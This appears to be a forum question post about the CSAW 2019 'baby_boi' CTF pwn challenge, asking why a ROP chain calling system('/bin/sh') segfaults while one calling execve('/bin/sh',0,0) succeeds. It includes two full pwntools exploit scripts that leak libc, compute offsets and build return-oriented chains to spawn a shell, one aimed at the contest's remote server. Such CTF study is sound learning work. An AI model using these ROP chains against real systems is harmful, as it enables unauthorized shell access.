System Hacking

turttle2s
system("/bin/sh") and execve("/bin/sh",0,0)

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1978


While solving the baby_boi challenge at CSAW 2019, I tried to spawn a shell with system("/bin/sh") but kept getting a segmentation fault. I debugged the core file, and it kept reporting an inaccessible address inside the library. In the end I couldn't solve the challenge, and when I looked at the writeups after the CTF ended, everyone returned into execve("/bin/sh",0,0) rather than system("/bin/sh").

When I swapped execve() for system() in the exploit code other people used, I got a segfault as well... (of course I also looked up the system() address and changed it.)
With execve() it succeeds... Is there some difference between these two functions?



Below is the exploit code I used.

======== exp.py ==========
from pwn import *

p = process('./baby_boi')

# Offsets into the libc shipped with the challenge (libc-2.27).
# The binary leaks the address of printf, so libc_base = leaked printf - printf_offset.
printf_offset = 0x64e80
system_offset = 0x4f440
pop_rdi = 0x400793      # "pop rdi ; ret" gadget inside the binary

# pwntools returns bytes, so split on byte strings
data = p.recv()
data = data.split(b"\n")[1]
print('first split =', data)

data = data.split(b" ")[3]
print('second split =', data)

log.info('\t  === GADGET ===')
printf_addr = int(data, 16)
libc_base = printf_addr - printf_offset
system_addr = libc_base + system_offset
binsh_addr = system_addr + 0x164a5a     # "/bin/sh" string in libc, relative to system

log.info('libc_base = 0x%08x' % libc_base)
log.info('printf_addr = 0x%08x' % printf_addr)
log.info('system_addr = 0x%08x' % system_addr)
log.info('pop_rdi = 0x%08x' % pop_rdi)

# 40 bytes of padding up to the saved return address, then the ROP chain:
# pop rdi ; ret  ->  rdi = "/bin/sh"  ->  system()
payload = b""
payload += b"A" * 40
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)

log.info('\t === EXPLOIT START ===')
p.sendline(payload)
p.interactive()
==========================


Below is another person's solution code.
Source: https://github.com/KEERRO/ctf-writeups/tree/master/CSAW%20CTF'19%20QUALS/BABY%20BOI

========= solve.py ===========
from pwn import *

env = {"LD_PRELOAD": "./libc-2.27.so"}   # run locally against the challenge libc
#p = process("./baby_boi", env=env)
p = remote("pwn.chal.csaw.io", 1005)

# Parse the leaked printf address (second line, fourth space-separated field)
data = p.recv()
data = data.split(b"\n")[1]
data = data.split(b" ")[3]
printf_libc = int(data, 16)
base = printf_libc - 0x0000000000064e80    # printf offset in libc-2.27
execve = base + 0x00000000000e4e30         # execve offset in libc-2.27
binsh = execve + 0xcf06a                   # "/bin/sh" string, relative to execve
print("base: ", hex(base))
print("execve_libc: ", hex(execve))
print("binsh: ", hex(binsh))
pop_rdi = 0x0000000000400793               # pop rdi ; ret
payload = b""
payload += b"A" * 40                       # padding up to the saved return address
payload += p64(0x0000000000400791)         # pop rsi ; pop r15 ; ret
payload += p64(0)                          # rsi = 0 (argv)
payload += p64(0)                          # r15 = 0 (unused)
payload += p64(pop_rdi)
payload += p64(binsh)                      # rdi = "/bin/sh"
payload += p64(execve)                     # execve("/bin/sh", 0, 0)
p.sendline(payload)
p.interactive()
==========================

  Hit : 2329     Date : 2019/09/16 04:56



    
turttle2s  How do I upload the binary ?_?  2019/09/16

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org